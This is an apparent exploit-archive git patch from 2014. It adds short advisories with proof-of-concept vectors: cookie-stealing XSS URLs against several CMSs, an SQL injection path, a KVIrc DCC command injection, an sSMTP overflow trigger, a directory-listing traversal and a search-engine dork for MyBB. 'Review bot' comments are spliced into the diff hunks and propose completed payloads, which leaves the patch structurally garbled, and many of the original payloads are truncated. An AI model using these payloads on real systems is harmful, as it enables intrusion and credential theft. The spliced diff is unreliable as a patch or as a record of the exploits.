From 059c038e05f93dbbcec987b822f4c8bc222fca39 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 22 Aug 2014 04:39:33 +0000 Subject: [PATCH] Updated 08_22_2014 --- files.csv | 13 ++++ platforms/asp/webapps/34376.txt | 7 ++ platforms/asp/webapps/34380.txt | 9 +++ platforms/jsp/webapps/34384.txt | 11 +++ platforms/linux/dos/34375.txt | 9 +++ platforms/linux/remote/34385.txt | 10 +++ platforms/multiple/remote/34372.txt | 9 +++ platforms/php/webapps/34373.txt | 17 +++++ platforms/php/webapps/34374.txt | 9 +++ platforms/php/webapps/34377.txt | 9 +++ platforms/php/webapps/34378.txt | 9 +++ platforms/php/webapps/34379.html | 109 ++++++++++++++++++++++++++++ platforms/php/webapps/34381.txt | 41 +++++++++++ platforms/php/webapps/34383.txt | 9 +++ 14 files changed, 271 insertions(+) create mode 100755 platforms/asp/webapps/34376.txt create mode 100755 platforms/asp/webapps/34380.txt create mode 100755 platforms/jsp/webapps/34384.txt create mode 100755 platforms/linux/dos/34375.txt create mode 100755 platforms/linux/remote/34385.txt create mode 100755 platforms/multiple/remote/34372.txt create mode 100755 platforms/php/webapps/34373.txt create mode 100755 platforms/php/webapps/34374.txt create mode 100755 platforms/php/webapps/34377.txt create mode 100755 platforms/php/webapps/34378.txt create mode 100755 platforms/php/webapps/34379.html create mode 100755 platforms/php/webapps/34381.txt create mode 100755 platforms/php/webapps/34383.txt
diff --git a/files.csv b/files.csv
index 073aadf3d..8380b5056 100755
--- a/files.csv
+++ b/files.csv
@@ -30958,3 +30958,16 @@ id,file,description,date,author,platform,type,port
 34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder '.mp3' File Remote Buffer Overflow Vulnerability",2009-10-31,4m!n,windows,dos,0
 34369,platforms/multiple/remote/34369.txt,"IBM Java UTF8 Byte Sequences Security Bypass Vulnerability",2010-07-23,IBM,multiple,remote,0
 34370,platforms/jsp/webapps/34370.txt,"SAP Netweaver 6.4/7.0 'wsnavigator' Cross Site Scripting Vulnerability",2010-07-23,"Alexandr Polyakov",jsp,webapps,0
+34372,platforms/multiple/remote/34372.txt,"PacketVideo Twonky Server 4.4.17/5.0.65 Cross Site Scripting and HTML Injection Vulnerabilities",2009-11-01,"Davide Canali",multiple,remote,0
+34373,platforms/php/webapps/34373.txt,"MC Content Manager 10.1 SQL Injection and Cross Site Scripting Vulnerabilities",2010-07-25,MustLive,php,webapps,0
+34374,platforms/php/webapps/34374.txt,"Joomla! FreiChat Component 1.0/2.x Unspecified HTML Injection Vulnerability",2010-07-26,nag_sunny,php,webapps,0
+34375,platforms/linux/dos/34375.txt,"sSMTP 2.62 'standardize()' Buffer Overflow Vulnerability",2010-07-26,"Brendan Boerner",linux,dos,0
+34376,platforms/asp/webapps/34376.txt,"e-Courier CMS 'UserGUID' Parameter Multiple Cross Site Scripting Vulnerabilities",2009-10-06,BugsNotHugs,asp,webapps,0
+34377,platforms/php/webapps/34377.txt,"Portili Personal and Team Wiki 1.14 Multiple Security Vulnerabilities",2010-10-04,Abysssec,php,webapps,0
+34378,platforms/php/webapps/34378.txt,"Clixint Technologies DPI Cross Site Scripting Vulnerability",2009-12-04,anonymous,php,webapps,0
+34379,platforms/php/webapps/34379.html,"SyndeoCMS 2.9 Multiple HTML Injection Vulnerabilities",2010-07-26,"High-Tech Bridge SA",php,webapps,0
+34380,platforms/asp/webapps/34380.txt,"Active Business Directory 2 'searchadvance.asp' Cross Site Scripting Vulnerability",2009-12-22,"Andrea Bocchetti",asp,webapps,0
+34381,platforms/php/webapps/34381.txt,"MyBB 1.8 Beta 3 - Multiple 
Vulnerabilities",2014-08-21,"DemoLisH B3yaZ",php,webapps,0
+34383,platforms/php/webapps/34383.txt,"Social Media 'index.php' Local File Include Vulnerability",2010-07-27,"Harri Johansson",php,webapps,0
+34384,platforms/jsp/webapps/34384.txt,"Jira 4.0.1 Cross Site Scripting and Information Disclosure Vulnerabilities",2010-07-28,MaXe,jsp,webapps,0
+34385,platforms/linux/remote/34385.txt,"KVIrc <= 4.0 '\r' Carriage Return in DCC Handshake Remote Command Execution Vulnerability",2010-07-28,unic0rn,linux,remote,0
diff --git a/platforms/asp/webapps/34376.txt b/platforms/asp/webapps/34376.txt
new file mode 100755
index 000000000..eaa427105
--- /dev/null
+++ b/platforms/asp/webapps/34376.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/41970/info
+
+e-Courier CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+https://www.example.com/home/index.asp?UserGUID=">
\ No newline at end of file
diff --git a/platforms/asp/webapps/34380.txt b/platforms/asp/webapps/34380.txt
new file mode 100755
index 000000000..95c4c2827
--- /dev/null
+++ b/platforms/asp/webapps/34380.txt
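Review bot: The version strings in the new index rows disagree with the advisory files they point to: 34375 is indexed as `sSMTP 2.62` while 34375.txt says `sSMTP 2.6.2`, 34384 as `Jira 4.0.1` while 34384.txt says `Jira 4.01`, and 34385 as `KVIrc <= 4.0` while 34385.txt names only `KVIrc 4.0.0`. files.csv is what downstream tooling keys on for version matching, so each pair should be reconciled to the version the vendor actually shipped (sSMTP releases are numbered 2.6x and Jira 4.0.1 exists, so the two .txt lines look like the errors). The 34381 row also appears to carry a line break inside its quoted description field (`Multiple ` / `Vulnerabilities`), which breaks line-oriented consumers of this CSV; keep that field on one physical line.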
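Review bot: The only PoC line, `https://www.example.com/home/index.asp?UserGUID=">`, ends at the attribute break-out and carries no script body, so as stored it does not demonstrate the XSS it claims. If the original payload was an HTML element that was lost on import, restore it; otherwise spell the intended payload out URL-encoded so it survives tooling, e.g. `UserGUID=%22%3E%3Cscript%3Ealert(1)%3C/script%3E`. The description also says "multiple" cross-site scripting vulnerabilities while a single parameter on a single page is given; either list the other injection points or narrow the wording.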
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41995/info
+
+Active Business Directory is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Active Business Directory 2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/demoactivebusinessdirectory/searchadvance.asp? <= xss
\ No newline at end of file
diff --git a/platforms/jsp/webapps/34384.txt b/platforms/jsp/webapps/34384.txt
new file mode 100755
index 000000000..86163b9ad
--- /dev/null
+++ b/platforms/jsp/webapps/34384.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/42025/info
+
+Jira is prone to multiple cross-site scripting vulnerabilities and an information disclosure vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+Attackers can exploit these issues to obtain sensitive information, steal cookie-based authentication information, and execute arbitrary client-side scripts in the context of the browser.
+
+Jira 4.01 is vulnerable; other versions may also be affected.
+
+http://www.example.com/ViewIssue.jspa?id=[VALID_ID]&watch=true&returnUrl=data:text/html,
+http://www.example.com/AttachFile!default.jspa?id=[VALID_ID]&returnUrl=javascript:alert(0)';foo='
+
diff --git a/platforms/linux/dos/34375.txt b/platforms/linux/dos/34375.txt
new file mode 100755
index 000000000..31e8e09fa
--- /dev/null
+++ b/platforms/linux/dos/34375.txt
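Review bot: The PoC `http://www.example.com/demoactivebusinessdirectory/searchadvance.asp? <= xss` names neither the vulnerable parameter nor a payload, so it can be neither reproduced nor turned into a detection signature from this file, and the files.csv title identifies only the page. Add the parameter with an encoded payload, e.g. `searchadvance.asp?<param>=%3Cscript%3Ealert(1)%3C/script%3E`, or state explicitly that the affected parameter was not disclosed. The `/demoactivebusinessdirectory/` prefix looks like a vendor demo install path and should be marked as a placeholder so testers do not treat it as fixed.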
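Review bot: The first vector `ViewIssue.jspa?id=[VALID_ID]&watch=true&returnUrl=data:text/html,` stops right after the media type with no body, so the payload is incomplete as stored; supply it URL-encoded, e.g. `returnUrl=data:text/html,%3Cscript%3Ealert(1)%3C/script%3E`, or note that it was lost. The second vector `returnUrl=javascript:alert(0)';foo='` depends on how returnUrl is reflected — the trailing `';foo='` suggests a break-out from a single-quoted JavaScript string rather than a plain redirect — and one sentence saying so would let readers classify it (reflected XSS inside an inline script vs. a javascript:-scheme redirect, which current browsers block). The advisory's `Jira 4.01` also does not match the `4.0.1` used in files.csv.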
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41965/info
+
+sSMTP is prone to a remote buffer-overflow vulnerability.
+
+An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+sSMTP 2.6.2 is vulnerable; other versions may also be affected.
+
+echo -n . ; for i in {1..2050} ; do echo -n $i ; done
\ No newline at end of file
diff --git a/platforms/linux/remote/34385.txt b/platforms/linux/remote/34385.txt
new file mode 100755
index 000000000..3c1aea138
--- /dev/null
+++ b/platforms/linux/remote/34385.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/42026/info
+
+KVIrc is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue can allow an attacker to execute arbitrary commands within the context of the affected application.
+
+KVIrc 4.0.0 is vulnerable; other versions may also be affected.
+
+/ctcp nickname DCC GET\rQUIT\r
+/ctcp nickname DCC GET\rPRIVMSG\40#channel\40:epic\40fail\r
\ No newline at end of file
diff --git a/platforms/multiple/remote/34372.txt b/platforms/multiple/remote/34372.txt
new file mode 100755
index 000000000..e0e3bc05c
--- /dev/null
+++ b/platforms/multiple/remote/34372.txt
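Review bot: The trigger `echo -n . ; for i in {1..2050} ; do echo -n $i ; done` shows how the oversized dot-prefixed line is generated but not how it reaches sSMTP, which is the step a tester needs; add a comment such as `# feed the output to ssmtp as the message body, e.g. ... | ssmtp user@example.com` (presumably via stdin — confirm against the 2.62 source of standardize()). Note that the loop concatenates the decimal values 1..2050, so the line is roughly 7,100 bytes long, not 2050; the text should not imply 2050 is the overflow threshold. The entry is classified `dos` in files.csv while the description claims arbitrary code execution; the file should state which outcome has actually been demonstrated.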
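Review bot: The two `/ctcp nickname DCC GET\rQUIT\r` lines write `\r` and `\40` as escape sequences, and the file does not say whether they are typed literally into KVIrc (which has its own escape handling) or must arrive at the victim as raw bytes 0x0D and 0x20 over the IRC connection; a comment such as `# \r = literal carriage return (0x0D), \40 = octal space; both must reach the victim's DCC handler unescaped` decides whether the PoC works. As far as the visible payloads show, what gets injected are IRC protocol commands (`QUIT`, `PRIVMSG`) into the victim's server connection, not operating-system commands, so "remote command-execution" should be qualified as IRC command injection to avoid over-classification. `KVIrc 4.0.0` here and `KVIrc <= 4.0` in files.csv should also be reconciled.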
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41929/info
+
+Twonky Server is prone to a cross-site scripting vulnerability and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML and script code could run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Versions prior to Twonky Server 4.4.18, 5.0.66, and 5.1 are vulnerable.
+
+http://www.example.com/twonky:9000/fake_config_page
\ No newline at end of file
diff --git a/platforms/php/webapps/34373.txt b/platforms/php/webapps/34373.txt
new file mode 100755
index 000000000..756063f0f
--- /dev/null
+++ b/platforms/php/webapps/34373.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/41949/info
+
+MC Content Manager is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Cross site scripting:
+
+1) http://www.example.com/article.php?root=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
+
+2) http://www.example.com/static.php?page=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
+
+3) http://www.example.com/cms/%3Cbody%20onload=alert(document.cookie)%3E/
+
+SQL Injection:
+
+1) http://www.example.com/cms/ua%20where%201=1--%20/
\ No newline at end of file
diff --git a/platforms/php/webapps/34374.txt b/platforms/php/webapps/34374.txt
new file mode 100755
index 000000000..57e03a4a4
--- /dev/null
+++ b/platforms/php/webapps/34374.txt
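Review bot: The PoC URL `http://www.example.com/twonky:9000/fake_config_page` is malformed — the `:9000` port follows a path segment instead of the host — and it names no parameter or payload, so nothing in this file reproduces either the XSS or the HTML injection. Presumably the original was `http://<host>:9000/...` and the hostname was replaced by example.com on import; rewrite it as `http://www.example.com:9000/<page>?<param>=<payload>` with the actual page and parameter, or state that they were not disclosed. The fixed-version line (`4.4.18, 5.0.66, and 5.1`) is the most useful detection data here and should stay as written.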
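Review bot: The SQL injection PoC `http://www.example.com/cms/ua%20where%201=1--%20/` is a bare tautology, which returns the same page as a benign request and so gives no observable confirmation; pair it with the `1=2` variant and say what differs, e.g. `compare with .../cms/ua%20where%201=2--%20/ (expect empty/altered content)`. The injection point is a URL path segment rather than a query parameter, which is worth one sentence since WAF and log rules keyed on query strings will miss it. The three XSS vectors are complete as stated.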
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41961/info
+
+Joomla! FreiChat component is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Versions prior to FreiChat 2.1.2 are vulnerable.
+
+
diff --git a/platforms/php/webapps/34377.txt b/platforms/php/webapps/34377.txt
new file mode 100755
index 000000000..64fa3c58e
--- /dev/null
+++ b/platforms/php/webapps/34377.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41973/info
+
+Portili Personal and Team Wiki are prone to multiple security vulnerabilities. These vulnerabilities include a cross-site scripting vulnerability, an arbitrary-file-upload vulnerability, and multiple information-disclosure vulnerabilities.
+
+Attackers can exploit these issues to obtain sensitive information, steal cookie-based authentication information, upload arbitrary files to the affected computer, and execute arbitrary script code in the context of the browser.
+
+Personal Wiki 1.14 and Team Wiki 1.14 are vulnerable; other versions may also be affected.
+
+http://www.example.com/ajaxfilemanager/ajaxfilemanager.php?path=../uploads/&view=1
\ No newline at end of file
diff --git a/platforms/php/webapps/34378.txt b/platforms/php/webapps/34378.txt
new file mode 100755
index 000000000..50987e75c
--- /dev/null
+++ b/platforms/php/webapps/34378.txt
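Review bot: As stored, this file carries no reproduction vector: after `Versions prior to FreiChat 2.1.2 are vulnerable.` only empty lines remain, so the entry is advisory-only. If the last line originally held an HTML payload that was stripped on import, restore it URL-encoded; otherwise add a line such as `No public PoC; injection point unspecified, fixed in FreiChat 2.1.2.` so readers know the omission is deliberate. That would also match the "Unspecified" wording already used for this entry in files.csv.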
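Review bot: The description claims XSS, arbitrary file upload and multiple information disclosures, but the single PoC `ajaxfilemanager/ajaxfilemanager.php?path=../uploads/&view=1` shows only a directory listing through the bundled file manager, so the file should say which claim it demonstrates, e.g. `# information disclosure: directory listing via ajaxfilemanager; upload and XSS vectors not included`. The `path=../uploads/` value also suggests `path` is not confined to a base directory, which is the more severe finding (listing of arbitrary directories) and deserves a one-line note. Whether the script is reachable without authentication is not stated and should be.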
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41986/info
+
+DPI is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+DPI version 1.1f is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/images.php?date=%3Cscript%3Ealert(XSS)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/34379.html b/platforms/php/webapps/34379.html
new file mode 100755
index 000000000..275c0ec27
--- /dev/null
+++ b/platforms/php/webapps/34379.html
@@ -0,0 +1,109 @@
+source: http://www.securityfocus.com/bid/41989/info
+
+SyndeoCMS is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+SyndeoCMS 2.9.0 is vulnerable; prior versions may also be affected.
+
+
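Review bot: The payload `images.php?date=%3Cscript%3Ealert(XSS)%3C/script%3E` decodes to `<script>alert(XSS)</script>`, where `XSS` is an undefined identifier, so even on a vulnerable page the injected script throws a ReferenceError and shows no dialog — the PoC reads as a false negative. Use a literal instead, e.g. `date=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E` or `alert(1)`. The `/path/` segment should also be marked as the install-prefix placeholder so it is not copied verbatim.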
+ + + + + + + + +' /> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + +
+ + + + +'> + + + + + + + + + + + + + + +' > + + +
+ + +
diff --git a/platforms/php/webapps/34381.txt b/platforms/php/webapps/34381.txt
new file mode 100755
index 000000000..c0d6c4c02
--- /dev/null
+++ b/platforms/php/webapps/34381.txt
@@ -0,0 +1,41 @@
+# Title: MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection
+# Google Dork: intext:"Powered By MyBB"
+# Date: 15.08.2014
+# Author: DemoLisH
+# Vendor Homepage: http://www.mybb.com/
+# Software Link: http://www.mybb.com/downloads
+# Version: 1.8 - Beta 3
+# Contact: onur@b3yaz.org
+***************************************************
+a) Cross Site Scripting in Installation Wizard ( Board Configuration )
+Fill -Forum Name, Website Name, Website URL- with your code, for example - ">localhost/install/index.php
+Now let's finish setup and go to the homepage.
+
+
+b) SQL Injection in Private Messages ( User CP )
+Go to -> Inbox, for example:localhost/private.php
+Search at the following code Keywords: